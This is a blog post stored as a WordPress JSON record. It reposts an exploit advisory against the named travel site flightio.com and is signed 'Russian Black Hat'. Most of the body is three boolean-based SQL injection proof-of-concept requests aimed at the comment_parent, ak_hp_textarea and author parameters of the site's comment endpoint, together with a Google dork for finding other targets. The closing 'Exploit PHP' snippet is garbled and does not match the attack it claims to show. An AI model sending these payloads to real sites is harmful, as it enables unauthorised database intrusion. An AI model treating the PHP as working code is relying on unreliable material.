{"id":56177,"date":"2024-04-09T21:19:54","date_gmt":"2024-04-09T17:19:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177988\/flightio-sql.txt"},"modified":"2024-04-09T21:19:54","modified_gmt":"2024-04-09T17:19:54","slug":"flightio-com-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/flightio-com-sql-injection\/","title":{"rendered":"Flightio.com SQL Injection"},"content":{"rendered":"<p>This site which has a security problem with the SQL INJECTION Vulnerability &#8220;CWE-89&#8221;.<br \/>We have repeatedly reported to this site that it has a security problem and has ignored our report.<br \/>We want to record this security issue<\/p>\n<p>#########################################################################################################################<br \/># #<br \/># Exploit Title : Site Flight agency airpol the Islamic Republic of Iran SQL INJECTION Vulnerability #<br \/># #<br \/># Author : E1.Coders #<br \/># #<br \/># Contact : E1.Coders [at] Mail [dot] RU #<br \/># #<br \/># Portal Link : https:\/\/flightio.com\/ #<br \/># #<br \/># Security Risk : Medium #<br \/># #<br \/># Description : All target&#8217;s IRanian AIRPOT websites #<br \/># #<br \/># DorK : &#8220;inurl:wp-comments-post.php%5Eauthor=&#8221; #<br \/># #<br \/>#########################################################################################################################<br \/># #<br \/># Expl0iTs: #<br \/>#<br \/># vuln type : SQLInjection<br \/># <br \/># refer address : https:\/\/flightio.com\/blog\/attractions\/best-chahbahar-attractions\/<br \/># <br \/># request type : POST<br \/># <br \/># action url : https:\/\/flightio.com\/blog\/wp-comments-post.php^author=6463106&amp;submit=\u0627\u0631\u0633\u0627\u0644 \u062f\u06cc\u062f\u06af\u0627\u0647&amp;comment_post_ID=64505&amp;akismet_comment_nonce=385c7c306e&amp;ak_js=98&amp;comment=WCRTEXTAREATESTINPUT8462957&amp;ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&amp;comment_parent=0<br \/># <br \/># parameter : comment_parent<br \/># <br \/># description : POST SQL INJECTION BooleanBased String<br \/># <br \/># POC : https:\/\/flightio.com\/blog\/wp-comments-post.php^author=6463106&amp;submit=\u0627\u0631\u0633\u0627\u0644\/**\/\u062f\u06cc\u062f\u06af\u0627\u0647&amp;comment_post_ID=64505&amp;akismet_comment_nonce=385c7c306e&amp;ak_js=98&amp;comment=WCRTEXTAREATESTINPUT8462957&amp;ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&amp;comment_parent=0%27\/**\/aNd\/**\/7462200=7462200\/**\/aNd\/**\/%276199%27=%276199<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>#<br \/># Expl0iTs: <br \/># vuln type : SQLInjection<br \/># <br \/># refer address : https:\/\/flightio.com\/blog\/travel-tips\/norouz-holiday-trips-in-iran\/<br \/># <br \/># request type : POST<br \/># <br \/># action url : https:\/\/flightio.com\/blog\/wp-comments-post.php^author=9640811&amp;submit=\u0627\u0631\u0633\u0627\u0644 \u062f\u06cc\u062f\u06af\u0627\u0647&amp;comment_post_ID=3173&amp;comment_parent=0&amp;akismet_comment_nonce=709cdb3e84&amp;ak_js=154&amp;comment=WCRTEXTAREATESTINPUT9791191&amp;ak_hp_textarea=WCRTEXTAREATESTINPUT8111319<br \/># <br \/># parameter : ak_hp_textarea<br \/># <br \/># description : POST SQL INJECTION BooleanBased String<br \/># <br \/># POC : https:\/\/flightio.com\/blog\/wp-comments-post.php^author=9640811&amp;submit=\u0627\u0631\u0633\u0627\u0644\/**\/\u062f\u06cc\u062f\u06af\u0627\u0647&amp;comment_post_ID=3173&amp;comment_parent=0&amp;akismet_comment_nonce=709cdb3e84&amp;ak_js=154&amp;comment=WCRTEXTAREATESTINPUT9791191&amp;ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)\/**\/aNd\/**\/4442431=4442431\/**\/aNd\/**\/(%276199%27)=(%276199<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/># # Expl0iTs: <br \/># vuln type : SQLInjection<br \/># <br \/># refer address : https:\/\/flightio.com\/blog\/travel-tips\/hormuz-island-travel-guide\/<br \/># <br \/># request type : POST<br \/># <br \/># action url : https:\/\/flightio.com\/blog\/wp-comments-post.php^submit=\u0627\u0631\u0633\u0627\u0644 \u062f\u06cc\u062f\u06af\u0627\u0647&amp;comment_post_ID=64267&amp;comment_parent=0&amp;akismet_comment_nonce=57b7866a2c&amp;ak_js=15&amp;comment=WCRTEXTAREATESTINPUT9752286&amp;ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&amp;author=99999999<br \/># <br \/># parameter : author<br \/># <br \/># description : POST SQL INJECTION BooleanBased String<br \/># <br \/># POC : https:\/\/flightio.com\/blog\/wp-comments-post.php^submit=\u0627\u0631\u0633\u0627\u0644\/**\/\u062f\u06cc\u062f\u06af\u0627\u0647&amp;comment_post_ID=64267&amp;comment_parent=0&amp;akismet_comment_nonce=57b7866a2c&amp;ak_js=15&amp;comment=WCRTEXTAREATESTINPUT9752286&amp;ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&amp;author=99999999%27)\/**\/oR\/**\/6197419=6197419\/**\/aNd\/**\/(%276199%27)=(%276199 #<br \/>#########################################################################################################################<br \/># #<br \/># | Security Is JOCK | #<br \/># #<br \/># | Russian Black Hat | #<br \/># #<br \/>#########################################################################################################################<\/p>\n<p>Exploit PHP :<\/p>\n<p>global $wpdb;<\/p>\n<p>$author = &#8216;99999999&#8217;;<br \/>$comment = &#8216;WCRTEXTAREATESTINPUT9752286&#8217;;<br \/>$ak_hp_textarea = &#8216;WCRTEXTAREATESTINPUT5571116&#8217;;<\/p>\n<p>$wpdb-&gt;prepare(<br \/>&#8220;INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)&#8221;,<br \/>$comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author<br \/>);<\/p>\n<p>$wpdb-&gt;insert(&#8216;wp_comments&#8217;, array(<br \/>&#8216;comment_post_ID&#8217; =&gt; $comment_post_ID,<br \/>&#8216;comment_author&#8217; =&gt; $comment_author,<br \/>&#8216;comment_content&#8217; =&gt; $comment_content,<br \/>&#8216;comment_parent&#8217; =&gt; $comment_parent,<br \/>&#8216;akismet_comment_nonce&#8217; =&gt; $akismet_comment_nonce,<br \/>&#8216;ak_js&#8217; =&gt; $ak_js,<br \/>&#8216;author&#8217; =&gt; $author<br \/>));<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This site which has a security problem with the SQL INJECTION Vulnerability &#8220;CWE-89&#8221;.We have repeatedly reported to this site that it has a security problem and has ignored our report.We want to record this security issue ########################################################################################################################## ## Exploit Title : Site Flight agency airpol the Islamic Republic of Iran SQL INJECTION Vulnerability ## ## &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56177","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56177","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56177"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56177\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56177"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56177"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56177"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}